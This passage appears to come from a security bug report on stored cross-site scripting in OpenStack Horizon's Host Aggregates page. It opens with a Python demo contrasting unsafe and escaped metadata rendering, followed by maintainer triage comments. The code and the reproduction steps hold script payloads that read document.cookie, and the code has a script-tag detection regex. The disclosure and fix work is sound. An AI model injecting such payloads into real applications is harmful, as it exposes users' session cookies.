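# SafeString/mark_safe/escape below are stand-ins for the Django helpers.
import html
import re


class SafeString(str):
    """A string the template layer emits verbatim (stand-in for Django's SafeString)."""


def mark_safe(s: str) -> SafeString:
    return SafeString(s)


def escape(s) -> SafeString:
    # Already-safe markup passes through; everything else is HTML-escaped.
    if isinstance(s, SafeString):
        return s
    return SafeString(html.escape(str(s), quote=True))


def render_cell(value) -> str:
    """What the template does with a column value: auto-escape unless marked safe."""
    return str(escape(value))


# Vulnerable pattern: format raw user values into markup, then mark it all safe.
# The values never pass through escape(), so the browser executes them.
def render_metadata_unsafe(metadata: dict) -> SafeString:
    items = "".join("<li>{} = {}</li>".format(k, v) for k, v in metadata.items())
    return mark_safe(items)


# Hardened pattern: escape each key and value first, and mark only the markup we
# wrote ourselves as safe (the same idea as Django's format_html).
def render_metadata_safe(metadata: dict) -> SafeString:
    items = "".join(
        "<li>{} = {}</li>".format(escape(k), escape(v)) for k, v in metadata.items()
    )
    return mark_safe(items)


SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def has_live_script(rendered: str) -> bool:
    """Detection check on rendered output: a literal <script> tag inside a data
    cell means a user-controlled value reached the browser unescaped."""
    return SCRIPT_TAG.search(rendered) is not None


# Constructed sample: the aggregate from the report, as the view would pass it.
AGGREGATE = {
    "name": "invisible_to_admin<script>xss</script>",
    "availability_zone": "invisible_to_admin<script>alert(document.cookie)</script>",
}
METADATA = {"availability_zone": AGGREGATE["availability_zone"]}


def render_row(metadata_renderer) -> dict:
    """Render the three cells of interest the way the Host Aggregates table does."""
    return {
        "name": render_cell(AGGREGATE["name"]),
        "availability_zone": render_cell(AGGREGATE["availability_zone"]),
        "metadata": render_cell(metadata_renderer(METADATA)),
    }


if __name__ == "__main__":
    for label, renderer in (("unsafe", render_metadata_unsafe), ("safe", render_metadata_safe)):
        row = render_row(renderer)
        print(label, "metadata cell:", row["metadata"])
        print(label, "live script tag:", has_live_script(row["metadata"]))
```

The unsafe renderer reproduces the Metadata cell byte-for-byte as it appears in the response body above, while the Name cell is escaped in both cases because it goes through the template's normal auto-escaping.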

Thierry Carrez (ttx) wrote :

Sigh ;)

Changed in ossa:
importance: Undecided → Medium
status: Incomplete → Confirmed
Thierry Carrez (ttx) wrote :

Horizon core-sec: anyone up for a patch there?

Tristan Cacqueray (tristan-cacqueray) wrote :

Looking at stable releases, Icehouse also seems to be affected. Can Horizon core-sec look at the Havana impact?

Julie Pichon (jpichon) wrote :

Hi Michael, thank you for the bug report. Would you mind confirming the steps to follow to reproduce the bug? When I saw the beginning of the description mentioning "/admin/aggregates/1/update" I thought it might be a place that was missed when fixing bug 1349491, but perhaps not, as I can't quite reproduce it with only this information. Thank you.

Michael Xin (michael-xin) wrote :

Thanks for working on this. First, log into the control panel, click on Host Aggregate, then click the "Create Host Aggregate" button. In the Name field, put "testzy"; in the availability zone, put "test<script>alert(document.cookie)</script>", then click the "create host aggregate" button. You can see the popup then.

Michael Xin (michael-xin) wrote :

It should be the same issue as bug 1349491. I can try to get the latest version and try again some time later.

Julie Pichon (jpichon) wrote :

Thank you for the reply! The steps you provided do indicate this is a duplicate, sorry about the initial triaging delay.

Thierry Carrez (ttx)
information type: Private Security → Public Security